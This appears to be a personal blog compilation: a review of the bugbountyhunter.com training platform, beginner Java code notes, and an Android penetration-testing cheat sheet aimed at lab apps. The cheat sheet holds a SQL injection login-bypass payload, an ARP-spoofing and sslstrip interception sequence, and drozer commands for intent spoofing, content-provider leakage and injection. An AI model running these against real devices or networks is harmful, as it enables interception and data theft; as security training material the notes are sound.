Bug Bounty Hunter Review

Introduction

Bug Bounty Hunter is a platform which provides real world web application challenges base on real bug bounty findings.

Description

On the evening of June 3, 2021, I was exchanging my BTC about to buy the subscription of bugbountyhunter.com.Unfortunately my money was not enough to buy it because I was exchanged for the fixed price. I need to exchange more but it takes almost an hour. I know that bugbountyhunter.com only open their membership for short time. So, I dm to Zseano who is the founder of bugbountyhunter.com to open a subscription for a couple of days. He told me that it won’t ever close and also said today is my lucky day. Yes, he definitely made my day. I really thank z for giving me this opportunity to join the awesome platform.

Labs

This is not the first lab that I bought. I bought pentester academy in the past as well and also bought pentesterlab in the same month with bug bounty hunter. Couple to the other, it is just different. It will make you feel like you’re hunting on the real target. If you found a bug, you need to write the report with detailed observation of the bug and mitigation as well.

Hackevents

The one thing that I like about bugbountyhunter.com is that they have a virtual live hacking event where you can earn some bounties for your findings if you are level 2. You actually got paid for what you’ve done. That is a really good thing.

Reports

You can read all the reports of the past virtual live hacking event which is first blood even if you’re not a member of bug bounty hunter. There are a ton of free challenges and material that you can learn on bug bounty hunter for free.

FirstBlood Disclosed Reports : https://www.bugbountyhunter.com/hackevents/firstblood

Hackerone Disclosed Reports: https://www.bugbountyhunter.com/disclosed/

Zseano’s methodology: https://www.bugbountyhunter.com/methodology/zseanos-methodology.pdf

Summary

The bug bounty hunter is a starting point for anyone who wants to learn bug bounty through hands-on web application challenges and writing the report. It covers everything you need as a beginner bug bounty hunter from finding bugs to writing a good report. If you are looking to get started with bug bounty or want to be a better security researcher then sign up for the membership of https://www.bugbountyhunter.com, as this is fantastic value for what you will learn throughout and it will pay for itself when you find that first bug on the virtual live hacking event of the bug bounty hunter. or other platforms. Zseano is a great guy in the community and he gave his book for free as well. Support his work by signing up for a membership on bug bounty hunter for being a great guy in the community.

Java Notes

Description

This is the note that I’ve taken while I was learning java.

Primitive Types

Type  Bytes Range

Bytes	1   [-128,127]
short	2   [-32k,32k]
int		4   [-2B,1B]
long	8
float	4
double	8
char	2   A,B,C...
boolean 1   true/false

Declaring primitive type variables in Java

primitive type to use for simple value

package com.osibyte;

public class Main {

    public static void main(String[] args) {
        byte age = 30;
	    long viewsCount = 3_123_456_789L; //To use for long 
	    float price = 10.99F; //to use for floar
	    char letter = 'A'; // single quote
	    boolean isEligible = false;
	    
    }
}

primitives type copy by the values

Declaring reference type variables in Java

reference to use for complex objects

package com.osibyte;

import java.util.Date;

public class Main {

    public static void main(String[] args) {
		byte age = 30;
		Date now = new Date();
		System.out.println(now);

    }
}

reference type copied by the references

package com.osibyte;

import java.awt.*;


public class Main {

    public static void main(String[] args) {
		Point point1 = new Point(1,1);
		Point point2 = point1;
		point1.x = 2;
		System.out.println(point2);
    }
}

Result:

java.awt.Point[x=2,y=1]

Escape Squences

package com.osibyte;

public class Main {

    public static void main(String[] args) {
    	String message1 = "Hello \"chan\"";
		String message2 = "C:\\Users\\administrator\\flag";
		System.out.println(message1);
		System.out.println(message2);

    }
}

Arrays

package com.osibyte;

import java.util.Arrays;

public class Main {

    public static void main(String[] args) {
    	int[] numbers = new int[5];
    	numbers[0] = 1;
    	numbers[1] = 2;

		System.out.println(Arrays.toString(numbers));

    }
}
package com.osibyte;

import java.util.Arrays;

public class Main {

    public static void main(String[] args) {
    	int[] numbers = { 2, 3, 5, 1, 4};
		System.out.println(numbers.length);
    }
}

Sorting arrays

package com.osibyte;

import java.util.Arrays;

public class Main {

    public static void main(String[] args) {
    	int[] numbers = { 2, 4, 5, 1, 3};
		Arrays.sort(numbers);
		System.out.println(Arrays.toString(numbers));

    }
}

Multidimensional Arrays

package com.osibyte;

import java.util.Arrays;

public class Main {

    public static void main(String[] args) {
    	int[][] numbers = new int[2][3];
    	numbers[0][0] = 1;
		System.out.println(Arrays.deepToString(numbers));

    }
}
package com.osibyte;

import java.util.Arrays;

public class Main {

    public static void main(String[] args) {
    	int[][] numbers = { { 1, 2, 3}, {4, 5, 6} };
    	numbers[0][0] = 1;
		System.out.println(Arrays.deepToString(numbers));

    }
}

Arithematic Expressions

package com.osibyte;

public class Main {

    public static void main(String[] args) {
    	int adding =  10 + 3;
    	double division = (double)10 / (double)3;
    	int x = 1;
    	x++;
		System.out.println(adding);
		System.out.println(division);
		System.out.println(x);

    }
}

Order Of Operations

package com.osibyte;

public class Main {

    public static void main(String[] args) {
    	int x = (10 + 3) * 2;
		System.out.println(x);

    }
}

Casting

package com.osibyte;

public class Main {

    public static void main(String[] args) {
    	// Implicit casting
		// Bytes > short > int > long > float > double
    	double x = 1.1;
    	int y = (int)x + 2;
		System.out.println(y);

    }
}
package com.osibyte;

public class Main {

    public static void main(String[] args) {
    	// Implicit casting
		// Bytes > short > int > long > float > double
    	String x = "1";
    	int y = Integer.parseInt(x) + 2;
		System.out.println(y);

    }
}
package com.osibyte;

public class Main {

    public static void main(String[] args) {
    	// Implicit casting
		// Bytes > short > int > long > float > double
    	String x = "1.1";
    	double y = Double.parseDouble(x) + 2;
		System.out.println(y);

    }
}

formating numbers

Currency

package com.osibyte;

import java.text.NumberFormat;

public class Main {

    public static void main(String[] args) {
		NumberFormat currency = NumberFormat.getCurrencyInstance();
		String result = currency.format(123456.891);
		System.out.println(result);

    }
}

Percent

package com.osibyte;

import java.text.NumberFormat;

public class Main {

    public static void main(String[] args) {
		NumberFormat percent = NumberFormat.getPercentInstance();
		String result = percent.format(0.1);
		System.out.println(result);

    }
}

Another method for percent

package com.osibyte;

import java.text.NumberFormat;

public class Main {

    public static void main(String[] args) {

		String result = NumberFormat.getPercentInstance().format(0.1);
		System.out.println(result);

    }
}

Reading Input

Byte

package com.osibyte;

import java.text.NumberFormat;
import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
		Scanner scanner = new Scanner(System.in);
		System.out.print("Age: ");
		byte age = scanner.nextByte();
		System.out.println("You are " + age);

    }
}

Name

package com.osibyte;

import java.text.NumberFormat;
import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
		Scanner scanner = new Scanner(System.in);
		System.out.print("What is your name?: ");
		String name = scanner.nextLine();
		System.out.println("My name is" + name);

    }
}

Mortgage Calculator

Principal: 10000
Annual Interet Rate: 3.92
Period (Years): 30
Morgage: 
package com.osibyte;

import java.text.NumberFormat;
import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
    	final byte months = 12;
    	final byte percent = 100;

		Scanner scanner = new Scanner(System.in);

		System.out.print("Principal: ");
		int principal = scanner.nextInt();


		System.out.print("Annual Interest Rate: ");
		float rate = scanner.nextFloat();
		float monthlyInterest = rate / percent / months;



		System.out.print("Period (Years): ");
		byte years = scanner.nextByte();
		int numberOfPayments =  years * months;


		double mortgage = principal * (monthlyInterest * Math.pow(1 + monthlyInterest , numberOfPayments) / (Math.pow(1 + monthlyInterest ,numberOfPayments) - 1));

		String mortgageformatted = NumberFormat.getCurrencyInstance().format(mortgage);
		System.out.println("Mortgage: " + mortgageformatted);



    }
}

Control Flow

  • Comparison Operators
  • Logical Operators
  • Conditional statements
  • Loops

Comparison Operators

to compare primitive values

! <= => ==

Logical Operators

package com.osibyte;

public class Main {

    public static void main(String[] args) {
    	int temp = 22;
    	boolean isWarm = temp > 20 && temp < 30;
		System.out.println(isWarm);
    }
}
package com.osibyte;

public class Main {

    public static void main(String[] args) {
    	boolean hasHighIncome = true;
    	boolean hasGoodGrade = true;
    	boolean hasCriminalRecord = false;
    	boolean isEligible = (hasHighIncome || hasGoodGrade) && !hasCriminalRecord ;
		System.out.println(isEligible);
    }
}

If Statements

package com.osibyte;

public class Main {

    public static void main(String[] args) {
    	int temp = 32;
    	if (temp > 30) {
			System.out.println("It's a hot day");
			System.out.println("Drink Water");
		}
    	else if (temp > 20 )
			System.out.println("Beautiful Day");
		else
			System.out.println("Cold Day");
    }
}

Simplifying If Statements

package com.osibyte;

public class Main {

    public static void main(String[] args) {
    	int income = 120_000;
    	boolean hasHighIncome = (income > 100_000);
    	
    }
}

The Ternary Operator

package com.osibyte;

public class Main {

    public static void main(String[] args) {
    	int income = 120_000;
    	String className = income > 100_000 ? "First" : "Economy";
		System.out.println(className);
    }
}

Switch Statements

package com.osibyte;

public class Main {

    public static void main(String[] args) {
    	String role = "admin";

    	switch (role) {
			case "admin":
				System.out.println("You are admin");
				break;

			case "moderator":
				System.out.println("You are a moderator");
				break;

			default:
				System.out.println("You are a guest");
		}
    	if (role == "admin")
			System.out.println("You are admin");
    	else if (role == "moderator")
			System.out.println("You are a moderator");
    	else
			System.out.println("You are a guest");
    }
}

FizzBuzz

package com.osibyte;

import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
		Scanner scanner = new Scanner(System.in);
		System.out.print("Numbers: ");
		int number = scanner.nextInt();

		if (number % 5 == 0  && number % 3 == 0)
			System.out.println("FizzBuzz");
		else if (number %3 == 0)
			System.out.println("Buzz");
		else if (number % 5 == 0)
			System.out.println("Fizz");
		else
			System.out.println(number);
    }
}

for loops

for (int i = 0; i < 5; i++) // basic structure of for loop

package com.osibyte;

import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
		for (int i = 0; i < 5; i++)
			System.out.println("hello World");
    }
}

While loops

package com.osibyte;

import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
		for (int i = 5; i > 0; i--)
			System.out.println("hello World" + i);
		int i = 0;
		while (i > 0) {
			System.out.println("hello World" + i);
			i--;
		}
    }
}
package com.osibyte;

import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
		String input = "";
		Scanner scanner = new Scanner(System.in);
		while (!input.equals("quit")) {
			System.out.print("Input: ");
			input = scanner.next().toLowerCase();
			System.out.println(input);
		}
    }
}

Do while loops

do whie loop execute once

package com.osibyte;

import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
		String input = "";
		Scanner scanner = new Scanner(System.in);
		while (!input.equals("quit")) {
			System.out.print("Input: ");
			input = scanner.next().toLowerCase();
			System.out.println(input);
		}
		do {
			System.out.print("Input: ");
			input = scanner.next().toLowerCase();
			System.out.println(input);
		} while (!input.equals("quit"));
    }
}

Break and continue

package com.osibyte;

import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
		Scanner scanner = new Scanner(System.in);
		String input = "";
		while (true) {
			System.out.print("Input: ");
			input = scanner.next().toLowerCase();
			if (input.equals("pass"))
				continue;
			if (input.equals("quit"))
				break;
			System.out.println(input);
		};
    }
}

For Each Loop

package com.osibyte;

import java.util.Scanner;

public class Main {

    public static void main(String[] args) {
    	String[] fruits = { "Apple", "Mango" , "Orange" };

    	for (int i = 0; i < fruits.length; i++)
			System.out.println(fruits[i]);
    	for (String fruit : fruits)
			System.out.println(fruit);
	}
}

Mortgage Calculator

package com.osibyte;

import java.text.NumberFormat;
import java.util.Scanner;

public class Main {

	public static void main(String[] args) {
		final byte months = 12;
		final byte percent = 100;

		int principal = 0;

		Scanner scanner = new Scanner(System.in);

		System.out.println("Enter a number between 1,000 and 1,000,000");
		while (true) {
			System.out.print("Principal ($1K - $1M): ");
			principal = scanner.nextInt();
			if (principal >= 1000 && principal <= 1_000_000)
				break;
			System.out.println("Enter a number between 1,000 and 1,000,000");

		}
		float rate = 0;
		float monthlyInterest = 0;

		while (true) {
			System.out.print("Annual Interest Rate: ");
			rate = scanner.nextFloat();
			monthlyInterest = rate / percent / months;
			if (rate > 0 && rate <= 30)
				break;
			System.out.println("Enter a value greater than 0 and less than or equal 30");
		}


		System.out.print("Period (Years): ");
		byte years = scanner.nextByte();
		int numberOfPayments =  years * months;


		double mortgage = principal * (monthlyInterest * Math.pow(1 + monthlyInterest , numberOfPayments) / (Math.pow(1 + monthlyInterest ,numberOfPayments) - 1));

		String mortgageformatted = NumberFormat.getCurrencyInstance().format(mortgage);
		System.out.println("Mortgage: " + mortgageformatted);
		
	}
}

Android Pentest CheetSheet

Description

These are the notes that I took while I was learning Android Pentest. Will updated some methodology in soon!

Applications

  • home
  • dialer
  • sms/mms
  • IM
  • browser
  • camera
  • alarm
  • calculator
  • contacts
  • voice
  • dial
  • email
  • calendar
  • media player
  • photo
  • album
  • clock

APPLICATION FRAMEWORK

  • Activity Manager
  • Window Manager
  • Content Providers
  • View System
  • Notification Manager
  • Package Manager
  • Telephony Manager
  • Resource Manager
  • Location Manager

LIBRARIES

  • Surface Manager
  • Media Framework
  • SQLite
  • WebKite
  • Libc
  • OpenGLIES
  • Audio Manager
  • FreeType
  • SSL

Hardware Abstraction Layer

  • Graphics
  • Audio
  • Camera
  • Bluetooth
  • GPS
  • Radio(RIL)
  • Wifi

Linux Kernel

  • Display Driver
  • Camera Driver
  • Bluetooth Driver
  • Shared Memory Driver
  • Binder(IPC) Driver
  • USB Driver
  • Kernel Driver
  • Wifi Driver Audio Drivers
  • Power Managerment

Common Mobile Application Functions

  • Online Banking(Barclays)
  • Shopping(Amazon)
  • Social Network(Facebook)
  • Streaming(Skey go)
  • Gambling(Betfair)
  • Instant Messaging(Whatsapp)
  • Voice Chat(Skype)
  • Email(Gmail)
  • File sharing(Dropbox)
  • Games(angry bird)

Documents Stroage Applications allowing user to access sensitive business documents on demand

Travel and expenses applications allowing users to create , store and upload expenses to internal system

HR applications allowing user to access the payroll, time , slips , holiday, informations and other sensitive functionality

Internal service applications such as mobile applications that have been optimized to provide an internal resource such as the coperate internet

Internal instant messaging applications allowing users to chat in real time with other users regardless of location

Client Side Vulnerability

Insecure data storage

This category of the vulnerability incoperates the various defects that lead to an application’s stroing data on the mobile device in either cleartext and obfuscated format, using a hard-coded key , or any other means that can be trivially reversed by an attacker.

Insecure transmission of data

This involves any instance whereby an application does not use transport layer encryption to protect data in transit. It also includes cases where transport layer encryption is used but has been implemented in an insecure manner.

Lack of binary protections

This flaws means that an application does not employ any form of protection mechanism to complicate reverse engineering , malicious tampering or debugging.

Client-Side Injection

This category of vulnerability describes secnarios where untruested data is sent to an application and handled in unsafe manner . Typical origins of injection include other applications on the device and input populated into the application from the server.

Hard-coded password keys

This flaws arise when the developer embeds a sensitive piece of information such as password or an encryption key into the application.

Leakage of sensitive data

This involve cases where an application unintentionally leaks sensitive data though a side channel. This sepcifically includes data leakages that arise though use of a framework or OS and occur without the developer’s knowledge.

OWASP Mobile Top 10 risks from 2014

  • M1 – Weak Server-Side Control
  • M2 – Insecure Data Storage
  • M3 – Insufficient Data Storage
  • M4 – Unintended Data Leakage
  • M5 – Poor Authorization and Authentication
  • M6 – Broken Cryptography
  • M7 – Client Side Injection
  • M8 – Security Decisions via untrusted input
  • M9 – Improper session handling
  • M10- Lack of binary protections

OWASP Mobile Top 10 risks from 2016

  • M1 – Improper Platform Usage
  • M2 – Insecure Data Storage
  • M3 – Insecure Communication
  • M4 – Insecure Authentication
  • M5 – Insufficient Cryptography
  • M6 – Insecure Authorization
  • M7 – Client Code Quality
  • M8 – Code Tampering
  • M9 – Reverse Engineering
  • M10 – Extraneous Functionality

OWASP Top 10 mobile security tools

  • iMAS – Created by MITRE COPORTION, this project is an open source secure application framework for ios
  • GoatDroid – self‐contained training environment for Android applications.
  • iGoat – Similar to the goatdroid project
  • Damn Vulnerable IOS
  • MobiSec
  • Androick

Browser-based applications – The term describes applications that are usually a “mobile friendly” clone of the main site and loaded via the device’s browser.

Hybrid applications – The term refer to mobile applications that are a native wrapper for a webview and and often use a framework to access native device functionally.

Application Sandboxing

Each app runs inside it’s own sandbox.
One App cannot access the data associated with other apps.
/data/data/ is the directory where all app data is located.

Connecting to adb with bluestacks

adb connect localhost:5555
adb -s emulator-5554 shell

Start Learning OWASP Top 10 from 2014

M2-Insecure Data Storage

Android provides various ways to save app data.

It is up to the developer – What kind of data. How much data etc.

  • SharedPrefences
  • SQLite Databases
  • Internal Storage
  • External Storage
  • Using network connection

SharedPrefences

saving username and password without encrypting is not safe

OnePlus3T:/data/data/com.ist.challenge3/shared_prefs # cat userdetails.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="username">ist</string>
    <string name="password">ist</string>
</map>
OnePlus3T:/data/data/com.ist.challenge3/shared_prefs #

SQLite databases

reading files from adb

adb shell "su -c cat /data/data/com.ist.challenge4/databases/SQLINJECTION.db" > SQLINJECTION.db

M3-Insuffcient Transport Layer Protection

It is pretty common to exchange data between the Client and Server.
Many apps do not use SSL for transmitting data.
Many Apps trust Self Signed Certificates.
It is recommended to use certificates signed by a trusted CA provider
An attacker may evaesdrop to get sensitive data.

There are many possible attacks scenarios

Below are the few scenarios:

  • MITM with Burpsuite – Intercepting HTTP Traffic
  • MITM with Burpsuite – Intercepting SSL Traffic
  • Real world MITM attacks with arp spoofing
  • Passive data analysis with tcpdump and wireshark

MITM with Burpsuite – Intercepting HTTP Traffic

Configure the Proxy Server for bluestack

cd to bluestacks folder

C:\Program Files\BlueStacks>HD-ConfigHttpProxy.exe set 192.168.189.1 8080 connect to specified proxy
C:\Program Files\BlueStacks>HD-ConfigHttpProxy.exe reset                   reset/stop using proxy

Vulnerable url – http://demo.testfire.net/login.jsp
sqli payload

x' or 'x'='x

MITM with Burpsuite – Intercepting SSL Traffic

just adding certificate

Real World MITM attacks with arp spoofing

echo "1" > /proc/sys/net/ipv4/ip_forward

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <lientenPort>

sudo sslstrip.py -l <listenPort>

sudo arpspoof -i <interface> -t <targetip> <gateway>

M4-Unintended Data Leakage

When an application processes sensitive information taken as input from the user or any other source,it may result in placing data in an insecure location in the device.This insecure location could be accessible to other malicious apps running on the same device, thus leaving the device in a serious risk state.

  • URL Caching(Both Request and response)
  • Keyboard Press Caching
  • Copy/Paste Buffer Caching
  • Application backgrounding
  • Logging
  • HTML5 data storage
  • Browser cookie objects
  • Analytics data sent to 3rd parties

Unintended Data Leakage — Reading the clipboard

The software will paste the everything that u copy from anywhere.

That is the problem

Unintended Data Leakage — Logging

using logcat from adb

adb logcat | grep password

M5-Poor Authentication and Authorization

It has got various forms of attack vectors.

Due to offline usage requirements, mobile apps may be required to perform local authentication or authorization checks within the mobile app’s code.

But, it is always recommended to all the processing at server side and then load data onto the mobile.

Due to usability requirements,mobile apps allow for passwords that are 4 digits long.

They can easily brute forced.

Even if the passwords are stored as hashes on the server, an attacker can easily crack them using rainbow table attacks if the file where hashes are stored is compromised.

M6-Broken Cryptography

the mobile app use the encryption and decrption that fundamentally falwed and can be exploited by the adversy to decrypt sensitive data.

Poor key Management Processes

Including the keys in the same attacker-readable directory as the encrypted content.

Avoid the use of hardcoded keys within the binary.

Creating custom encryption protocols

use apktool to decompile source code if there is any hash that can be cracked. It will be vulnerable to broken cryptography.

M7-Clientside Attack — SQL Injection at Client Side

x' or 'x'='x

and can easily bypass login without username and password

M7-Frame Injection in webviews

<iframe src="http://info.cern.ch/">

M8-Security Decisions via untrusted inputs — Intent Spoofing

The mobile application can accept data from all kinds of sources.
am – activity manager
it will be exported as True we can easily exploited

am start -n com.ist.challenge1/.Welcome

M9-Improper Session Handling

Session related attacks come into picture if, the seesion id is compromised , or not invalidated properly in the backend. Insecure token creation and session timeouts are not implemented properly.

M10-Lack of Binary Exploitation

Reversing adnroid apps with APKTOOL
Reversing android apps with dex2jar
Exploiting debuggable apps using JDB

Setting Up Drozer

Drozer is a framework for Android Security assessments developed by MWR labs.

Drozer allow to assume the role of an Android app and to interact with other apps, through Android’s Inter-Process Communication(IPC) mechanism and the underlying operating system.

Has got nice modules such as leaking content providers, SQL Injection, LFI.
set up for port forwarding

adb -s emulator-5554 forward tcp:31415 tcp:31415
drozer console connect

Getting the list of all modules in drozer

dz> list

Getting the list of all packages installed

run app.package.list

to run specific package

run app.package.list -f challenge1

Getting package information

run app.package.info -a [package name]
dz> run app.package.info -a com.ist.challenge1
Package: com.ist.challenge1
  Application Label: Challenge1
  Process Name: com.ist.challenge1
  Version: 1.0
  Data Directory: /data/user/0/com.ist.challenge1
  APK Path: /data/app/com.ist.challenge1-2/base.apk
  UID: 10059
  GID: []
  Shared Libraries: null
  Shared User ID: null
  Uses Permissions:
  - None
  Defines Permissions:
  - None

Finding out the attack surface

run app.package.attacksurface [package name]
dz> run app.package.attacksurface com.ist.challenge1
Attack Surface:
  2 activities exported
  0 broadcast receivers exported
  0 content providers exported
  0 services exported
    is debuggable

Listing out activities in a package

run app.activity.info -a [packagename]

Finding the content providers of a package

run scanner.provider.finduris -a [packagename]

Querying content providers

run app.provider.query [URI]

Inserting data into content providers

run app.provider.insert [URI] [-type] column name [value]

Intent Spoofing with drozer

first it check the activity and just run activity

dz> run app.activity.info -a com.ist.challenge1
Package: com.ist.challenge1
  com.ist.challenge1.MainActivity
    Permission: null
  com.ist.challenge1.Welcome
    Permission: null
dz> run app.activity.start --component com.ist.challenge1  com.ist.challenge1.Welcome

Exploiting Content Provider Leakage

Listing out activities in a package

run app.activity.info -a [package name]

Finding the secret content providers of a package.

run scanner.provider.finduris -a [package name]
run app.package.list -f vul
dz> run app.package.attacksurface com.androidpentesting.vulcontentprovider
Attack Surface:
  1 activities exported
  0 broadcast receivers exported
  1 content providers exported
  0 services exported
    is debuggable
dz> run scanner.provider.finduris -a com.androidpentesting.vulcontentprovider
Scanning com.androidpentesting.vulcontentprovider...
Able to Query    content://com.androidpentesting.vulcontentprovider.data/userdetails/
Able to Query    content://com.androidpentesting.vulcontentprovider.data/
Able to Query    content://com.androidpentesting.vulcontentprovider.data/userdetails
Able to Query    content://com.androidpentesting.vulcontentprovider.data

Accessible content URIs:
  content://com.androidpentesting.vulcontentprovider.data/
  content://com.androidpentesting.vulcontentprovider.data/userdetails/
  content://com.androidpentesting.vulcontentprovider.data
  content://com.androidpentesting.vulcontentprovider.data/userdetails
dz> run scanner.provider.finduris -a com.androidpentesting.vulcontentprovider
Scanning com.androidpentesting.vulcontentprovider...
Able to Query    content://com.androidpentesting.vulcontentprovider.data/userdetails/
Able to Query    content://com.androidpentesting.vulcontentprovider.data/
Able to Query    content://com.androidpentesting.vulcontentprovider.data/userdetails
Able to Query    content://com.androidpentesting.vulcontentprovider.data

Accessible content URIs:
  content://com.androidpentesting.vulcontentprovider.data/
  content://com.androidpentesting.vulcontentprovider.data/userdetails/
  content://com.androidpentesting.vulcontentprovider.data
  content://com.androidpentesting.vulcontentprovider.data/userdetails
dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/
| id | name | bankdetails |
dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/
| id | name | bankdetails |

dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/
| id | name | bankdetails |
| 1  | ch4n | ch4n        |
OnePlus3T:/ $ content query --uri content://com.androidpentesting.vulcontentprovider.data/userdetails/
Row: 0 id=1, name=ch4n, bankdetails=ch4n
OnePlus3T:/ $

SQL Injection Content Provider

dz> run scanner.provider.injection --uri content://com.androidpentesting.vulcontentprovider.data/userdetails/
Not Vulnerable:
  No non-vulnerable URIs found.

Injection in Projection:
  content://com.androidpentesting.vulcontentprovider.data/userdetails/

Injection in Selection:
  content://com.androidpentesting.vulcontentprovider.data/userdetails/
dz>

Check sqli is vulnerable or not

dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM users WHERE (')
dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/
| id | name | bankdetails |
| 1  | ch4n | ch4n        |

Resources

Reversing App

  • https://www.channyeinwai.com/2020/11/08/infosec-mobile-ctf-challenge-1/
  • https://ragingrock.com/AndroidAppRE/
  • https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05c-Reverse-Engineering-and-Tampering.md

Firebase Database Takeover Vulnerability

  • https://www.channyeinwai.com/2020/11/09/how-i-was-able-to-find-firebase-database-takeover-vulnerability-in-a-company/

Courses

Highly recommend to check this one. It is free and super cool.

  • https://manifestsecurity.com/android-application-security/

Books

  • https://www.amazon.com/Mobile-Application-Hackers-Handbook/dp/1118958500

Labs

  • https://github.com/abhi-r3v0/EVABS
  • https://github.com/OWASP/owasp-mstg/tree/master/Crackmes
  • https://github.com/B3nac/InjuredAndroid
  • https://github.com/dineshshetty/Android-InsecureBankv2
  • https://github.com/payatu/diva-android

Tools

  • adb
  • jdgui
  • Frida
  • drozer
  • dex2jar
  • apktool
  • SQLite Browser
  • MobsF

Checklist

  • https://github.com/OWASP/owasp-mstg

Hackerone Android Report And Resources

  • https://github.com/B3nac/Android-Reports-and-Resources